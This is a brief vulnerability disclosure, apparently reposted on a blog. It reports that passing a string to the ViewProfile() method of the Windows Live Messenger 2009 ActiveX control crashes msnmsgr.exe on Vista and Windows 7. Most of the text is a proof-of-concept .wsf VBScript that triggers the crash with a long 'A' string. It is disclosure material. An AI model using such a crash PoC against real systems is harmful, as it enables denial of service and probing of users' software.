Discussion:
Vulnerability is in Activex Control(msgsc.14.0.8089.726.dll)
Sending a string to ViewProfile() , cause a crash on msnmsgr.exe
*must be signed in Msn Messenger account for triggerin the vulnerability.
Vulnerable:
Windows Live Messenger 2009 on Windows Vista
Windows Live Messenger 2009 on Windows 7
PoC .wsf script:
‘works on vista and windows7
<package>
<job id=’DoneInVBS’ debug=’false’ error=’true’>
<object classid=’clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28′ id=’target’ />
<script language=’vbscript’>
arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
target.ViewProfile arg1
</script>
</job>
</package>
0 条评论。